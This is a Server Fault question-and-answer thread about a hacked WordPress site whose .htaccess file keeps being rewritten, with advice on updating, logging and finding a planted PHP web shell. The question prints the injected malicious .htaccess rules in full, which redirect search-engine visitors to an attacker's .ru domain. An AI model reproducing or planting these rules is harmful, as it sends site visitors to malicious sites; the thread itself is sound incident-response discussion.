1

I'm stumped. My clients wordpress site keeps having its .htaccess file hacked. It's adding code to redirect all traffic from search engines to different sites. It keeps changing the domain it's redirecting to. Currently (don't visit this site! prime-vermond.ru)

I have changed ftp passwords, wordpress admin passwords, updated all plugins, removed unused plugins, changed file permissions of .htaccess file to 444.

I'm thinking it might be a server exploit? The clients site is hosted with godaddy. I emailed them several times, waiting for a response on my latest support ticket.

I have run a search of all files looking for what might have malicious code in it but came up with nothing. I'm assuming they have the code base64 encoded and are using eval to run it.

Any ideas on how to better find a modified bad file? I'm at a loss now =/

Below is the entire code being added to the .htaccess file

ErrorDocument 400 http://prime-vermond.ru/trast/index.php                                                                                                                       
ErrorDocument 401 http://prime-vermond.ru/trast/index.php                                                                                                                       
ErrorDocument 403 http://prime-vermond.ru/trast/index.php                                                                                                                       
ErrorDocument 404 http://prime-vermond.ru/trast/index.php                                                                                                                       
ErrorDocument 500 http://prime-vermond.ru/trast/index.php                                                                                                                       
<IfModule mod_rewrite.c>                                                                                                                        
RewriteEngine On                                                                                                                        
RewriteCond %{HTTP_REFERER} .*google.* [OR]                                                                                                                     
RewriteCond %{HTTP_REFERER} .*ask.* [OR]                                                                                                                        
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]                                                                                                                      
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]                                                                                                                      
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]                                                                                                                        
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]                                                                                                                      
RewriteCond %{HTTP_REFERER} .*qq.* [OR]                                                                                                                     
RewriteCond %{HTTP_REFERER} .*excite.* [OR]                                                                                                                     
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]                                                                                                                      
RewriteCond %{HTTP_REFERER} .*msn.* [OR]                                                                                                                        
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]                                                                                                                       
RewriteCond %{HTTP_REFERER} .*aol.* [OR]                                                                                                                        
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]                                                                                                                     
RewriteCond %{HTTP_REFERER} .*goto.* [OR]                                                                                                                       
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]                                                                                                                       
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]                                                                                                                      
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]                                                                                                                      
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]                                                                                                                      
RewriteCond %{HTTP_REFERER} .*search.* [OR]                                                                                                                     
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]                                                                                                                        
RewriteCond %{HTTP_REFERER} .*bing.* [OR]                                                                                                                       
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]                                                                                                                        
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]                                                                                                                       
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]                                                                                                                        
RewriteCond %{HTTP_REFERER} .*blog.* [OR]                                                                                                                       
RewriteCond %{HTTP_REFERER} .*live.* [OR]                                                                                                                       
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]                                                                                                                        
RewriteCond %{HTTP_REFERER} .*mail.* [OR]                                                                                                                       
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]                                                                                                                     
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]                                                                                                                        
RewriteCond %{HTTP_REFERER} .*ya.* [OR]                                                                                                                     
RewriteCond %{HTTP_REFERER} .*aport.* [OR]                                                                                                                      
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]                                                                                                                       
RewriteCond %{HTTP_REFERER} .*flickr.*                                                                                                                      
RewriteRule ^(.*)$ http://prime-vermond.ru/trast/index.php [R=301,L]
Clint Chaney
  • 123
  • 4
  • possible duplicate of [My server's been hacked EMERGENCY](http://serverfault.com/questions/218005/my-servers-been-hacked-emergency) – John Gardeniers Sep 29 '11 at 03:43

3 Answers3

4

Either your application code is being exploited or someone has phished/guessed your account credentials. Make sure your wp code is up to date, including any plugins, and make sure you change your account password.

EEAA
  • 108,414
  • 18
  • 172
  • 242
  • Thanks. I updated the Authentication Unique Keys and Salts but still a no go =/ Plugins are up to date but it is an older version of wordpress. Upgrading would break the layout so my client didn't want to upgrade. Should I force the upgrade? – Clint Chaney Sep 29 '11 at 02:41
  • 2
    @ClintChaney [Yes, upgrade.](http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wordpress) – Shane Madden Sep 29 '11 at 02:47
  • 3
    "so my client didn't want to upgrade" -- famous last words, my friend. :) By using wordpress (one of the most widely-deployed and most frequently exploited CMSes out there) you're committing yourself to staying as up-to-date as humanly possible, installing updates within days if not hours of when they come out. – EEAA Sep 29 '11 at 02:56
  • Yeah, I tried explaining that =/ Hopefully they won't still refuse. Thanks! – Clint Chaney Sep 29 '11 at 03:03
  • Well unfortunately it's still happening =/ even after upgrades – Clint Chaney Sep 29 '11 at 03:21
  • 1
    You need to completely wipe your entire DocumentRoot. Empty, as in zero files left. Then re-deploy from a known-good backup. – EEAA Sep 29 '11 at 03:24
  • Found the bad files.. This was the comment in the main file # Web Shell by oRb – Clint Chaney Sep 29 '11 at 04:15
2

Set all possible logging options on. Wait for it to happen again. Then note the last modified time on the file and then check the access/error logs to see if anything unusual was going on at that time.

David Schwartz
  • 31,215
  • 2
  • 53
  • 82
  • Thanks David I'll give that a try. I enabled web logs on her server earlier. Just have to wait for them to be generated. – Clint Chaney Sep 29 '11 at 02:45
0

I was having the same problem and this was our solution.

Background

There was a security hole in one of our cms installations, in our case was an alpha version of joomla 1.6 used for testing that was left with out care... is irrelevant which alpha version was, there is a release and much secure version (1.7) now :P .

The hole was generated by the file/image uploading code. This part of the cms didn't validate anything so anybody can upload any kind of file (a php file in our case) and execute externally by calling the file.

The php file (in our case) was uploaded to the images directory, especifically the folder that all articles has access to upload, in our case and this particular installation was domain.com/images/stories/.

This php code scanned for all apache configuration files (.htaccess) and add the rules you describe above. The code jump levels up one by one until it was unable to have read or write access, adding this code to any .htaccess file it found by level or creating it if didn't exist.

Event if you delete or replace the .htaccess files, these will be created or modified again (every hour in our case) by executing the php code.

Solution

We start tracking down the files using its modification date and filtering by the most recently modified. We use the .htaccess files (recently modified) as breadcrumbs to find the source.

If you have access to shell this is easier, otherwise check by the last modified folder, you will find a .htaccess file inside every subfolder. You basically will end up with some php file(s) with recent date and probably with executable permissions for public access (0606 or similar).

If you try to download this code, your antivirus will pop up with a warning, in our case Avira display a warning for Trojan - Backdoor PHP/C99shell.B, so don't bother.

But if you are so curious then change the extension to something else and/or zip packed it to download it... or disable your antivirus for a second, but thats up to you.

Anyway, once you find this/these file(s) delete them and update your system or uninstalled (as we did) if need to fill the security hole.

Hope this help someone! :D

Paco Rivera
  • 1